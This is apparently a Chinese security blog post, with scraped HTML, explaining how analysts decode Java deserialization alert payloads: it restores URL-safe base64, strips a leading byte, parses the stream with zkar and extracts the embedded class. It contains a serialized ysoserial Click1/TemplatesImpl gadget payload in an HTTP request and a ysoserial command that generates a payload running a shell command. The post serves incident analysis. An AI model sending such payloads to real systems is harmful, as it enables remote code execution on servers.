29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAAAa1yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk_OR3e8-AQAGPGluaXQ-AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1b
|
|||
|
|
Host: 10.162.147.159:9200
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept: */*
|
|||
|
|
Connection: keep-alive
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
扣出其中`jato.pageSession` 参数的值,保存成`target.bin`
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
先处理替换和等号的问题
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat target.bin | tr '_-' '/+' > target_lack_equal.bin
|
|||
|
|
./add_equal.sh target_lack_equal.bin > target_base64.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
这里的`add.equal.sh`简单修改一下,支持传入文件名字
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
#!/bin/bash
|
|||
|
|
|
|||
|
|
if [ "$#" -ne 1 ]; then
|
|||
|
|
echo "Usage: $0 "
|
|||
|
|
exit 1
|
|||
|
|
fi
|
|||
|
|
|
|||
|
|
filename="$1"
|
|||
|
|
|
|||
|
|
if [ ! -f "$filename" ]; then
|
|||
|
|
echo "File '$filename' not found."
|
|||
|
|
exit 1
|
|||
|
|
fi
|
|||
|
|
|
|||
|
|
file_content=$(cat "$filename") # 读取文件内容
|
|||
|
|
|
|||
|
|
# 移除可能存在的换行符
|
|||
|
|
base64_string=$(echo -n "$file_content" | tr -d '\n')
|
|||
|
|
|
|||
|
|
# 计算base64编码字符串长度
|
|||
|
|
length=${#base64_string}
|
|||
|
|
|
|||
|
|
# 计算需要补充的等号数量
|
|||
|
|
remainder=$((length % 4))
|
|||
|
|
padding=$(((4 - remainder) % 4))
|
|||
|
|
|
|||
|
|
# 补充等号
|
|||
|
|
if ((padding &gt; 0)); then
|
|||
|
|
padding_string=$(printf '=%.0s' $(seq 1 $padding))
|
|||
|
|
base64_string="$base64_string$padding_string"
|
|||
|
|
fi
|
|||
|
|
|
|||
|
|
echo "$base64_string"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后处理base64和开头的`00`的问题
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
cat target_base64.bin | base64 -d > target_00.bin
|
|||
|
|
tail -c +2 target_00.bin > restore.bin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
然后就是用zkar解析一波
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
./zkar dump -f restore.bin > restore.txt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
将中间反序列化部分扣出来,保存成ser\_hex.txt
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
然后执行下面的脚本保存成class文件:
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
import re
|
|||
|
|
import sys
|
|||
|
|
|
|||
|
|
def remove_hex_line(input_string):
|
|||
|
|
pattern = re.compile(r'[0-9a-fA-F]{8}')
|
|||
|
|
return re.sub(pattern, '', input_string)
|
|||
|
|
|
|||
|
|
def remove_vertical_line(input_string):
|
|||
|
|
pattern = re.compile(r'\|.*\|')
|
|||
|
|
return re.sub(pattern, '', input_string)
|
|||
|
|
|
|||
|
|
def extract_hex_to_file(input_filename, output_filename):
|
|||
|
|
with open(input_filename, "r") as file:
|
|||
|
|
input_text = file.read()
|
|||
|
|
|
|||
|
|
input_text = remove_hex_line(input_text)
|
|||
|
|
input_text = remove_vertical_line(input_text)
|
|||
|
|
hex_data = re.findall(r"[0-9a-fA-F]{2}(?: [0-9a-fA-F]{2})*", input_text)
|
|||
|
|
hex_string = "".join(hex_data).replace(" ", "")
|
|||
|
|
|
|||
|
|
with open(output_filename, "wb") as file:
|
|||
|
|
file.write(bytes.fromhex(hex_string))
|
|||
|
|
|
|||
|
|
if __name__ == "__main__":
|
|||
|
|
if len(sys.argv) != 3:
|
|||
|
|
print("Usage: python3 extract_hex.py input_filename output_filename")
|
|||
|
|
sys.exit(1)
|
|||
|
|
|
|||
|
|
input_filename = sys.argv[1]
|
|||
|
|
output_filename = sys.argv[2]
|
|||
|
|
|
|||
|
|
extract_hex_to_file(input_filename, output_filename)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
python3 extract_hex.py ser_hex.txt restore.class
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
拿到class,然后丢到idea中,自己反编译了
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
0x05 后言
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
在分析的时候,发现 ysoserial 两次生成Payload会不一样的。。。卡了我好一会。。。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
虽然分析没问题,但是步骤略微繁琐,后续有空,可以考虑整合成一个工具,自动解码。
|
|||
|
|
|
|||
|
|
</textarea>
|
|||
|
|
<div id=layer-photos-demo>
|
|||
|
|
<div id=md_view><div class=markdown-body><h2 blockindex=0>0x00 前言</h2>
|
|||
|
|
<p blockindex=1>小伙伴在分析告警的时候,发现反序列化告警,Payload类似<code>AKztAA</code>,不知道咋解,于是有了本文。</p>
|
|||
|
|
<h2 blockindex=2>0x01 文件头</h2>
|
|||
|
|
<p blockindex=3>开始之前,先来复习一些涉及到的一些文件头</p>
|
|||
|
|
<p blockindex=4>以<code>rO0AB</code>开头,java序列化base64编码的数据<br>
|
|||
|
|
以<code>aced</code>开头,java序列化的16进制<br>
|
|||
|
|
以上两个,都可以用 <a href=https://github.com/phith0n/zkar>https://github.com/phith0n/zkar</a> 和<a href=https://github.com/NickstaDB/SerializationDumper>https://github.com/NickstaDB/SerializationDumper</a> 去解析</p>
|
|||
|
|
<p blockindex=5>以<code>cafebabe</code>开头,java class文件的16进制,保存成class,拖到idea中反编译</p>
|
|||
|
|
<p blockindex=6>有了这些文件头信息,下面就可以开始用ysoserial.jar生成Payload了</p>
|
|||
|
|
<h2 blockindex=7>0x02 原始payload</h2>
|
|||
|
|
<p blockindex=8>生成Payload</p>
|
|||
|
|
<pre blockindex=9><code class="hljs language-bash">java -jar ysoserial.jar Click1 <span class=hljs-string>"touch /tmp/xx"</span> > raw_payload.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=10><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=11>查看生成的Payload的十六进制</p>
|
|||
|
|
<pre blockindex=12><code class="hljs language-bash">hexdump -C raw_payload.bin
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=13><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=14>显然,以<code>aced</code>开头,java序列化的16进制,使用<code>zkar解析</code></p>
|
|||
|
|
<pre blockindex=15><code class="hljs language-bash">./zkar dump -f raw_payload.bin > raw_payload_decode.txt
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=16>然后查看生成的文件,应该可以找到下图:</p>
|
|||
|
|
<p blockindex=17><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA+EAAAL7CAYAAACSg4SvAAAACXBIWXMAAAsTAAALEwEAmpwYAAAgAElEQVR4nOzdeVhV1frA8S9wgMM8z5MMAiKDIDgjjjmTaWqWlqWZpjfTq2bXBrv1y7TyZpZNdhu0W2k2aWmlqVmKc4oDKIoyyQweARkO8Pvj4JETGAdELHk/z9NzO3uvvda719nefM9aey0DT0/PWoQQQgghhBBCCHHTGd7qAIQQQgghhBBCiPZCcasDELeetaWSO/rHkH4xj30Hk7THo7t0pIOXKz/tOswlVelNjeF/7yzikqqUmQtWATAuPpaZD47Snn9v7fd8+uXOmxpDW7G0UNK3ZxgRnf1IPHWeXxISUanKtOftba0ZEBuBj5czCoURaRm5fLdtv06Zbl2D8HZ3blD3z7uPUliswsJcybCBMY22X0stm7YmUFmlbrV69IlZCCGEEEIIIUl4u2FpoWRQXBSdAr2xs7Uk9UI2n3/zC4WFKnx93Fk8byIJB0/pJOGTxg0krlc4aRm57D+SfFPj8/Fyoaj4svbzhcxcdu05ho+XM5FhAVhbWdzU9ttK/NAePP3Pe1EoNH/0xo+Oo7q6hpdWfs4Xm3ZjYqzgp40vYmioO0llxpSRPDRnBWdTswB4YMJgesWENKj/Ym4hv+07gZ+3G4vnTbxuHL/tO0F2blGr1FNYdFmvmIUQQgghhBCShLcLIUHevLzkYdxdHSgvrwRgcFwU40fHcd8jS29xdI3bfyiZ/YeS6d8ngsiwgFsdTquZNTUehULBp1/u4NutCQwdGM0DEwYza1o8X2zaTW0tFBRe5sedh/glIRErczMemjSUkEBv/jlzLI8uXKVT379f+YTComs/XvyeeBaA06kZPL74bZ2yXSMCmDx+EOfOXyQ7t6jV6jFWKJoVsxBCCCGEEO2ZJOG3OaXShFVLZ2FpacaS5Wv5dsteFAoF4+6MZcHsccyYMpKNm37Vq64h/aMZP7ovPl7OKE1NyMouYNeeRN76YBM1NZr1/Z5dMAlfH1cOHDnNkP7R2NpYcOzkOZ5ZtpbCQhUAJiYKFswaR2zPUEyMjdl3OAkzpQlFf9b4dYwY3I0Jd8Xh6+2K6nIZew+cYsXqjZSVV2jL3Du2PyMGd+Pzr3cxqF9XunT2o7y8ko/Xb2Pdhu0taLVlDAwMsLe1BOC/n/xAfqGKrJwCHpgwGGtLc0yMFVRWqblj3JM615VXVPLGstl09PdoUOeuvYnafq2voqKKXXuO6Rwb3C8KgG+27G3VeqrUzYtZCCGEEEKI9kyS8NvcpLsHYG9nxYuvfcamHxKYPGEQUeEB2lHPo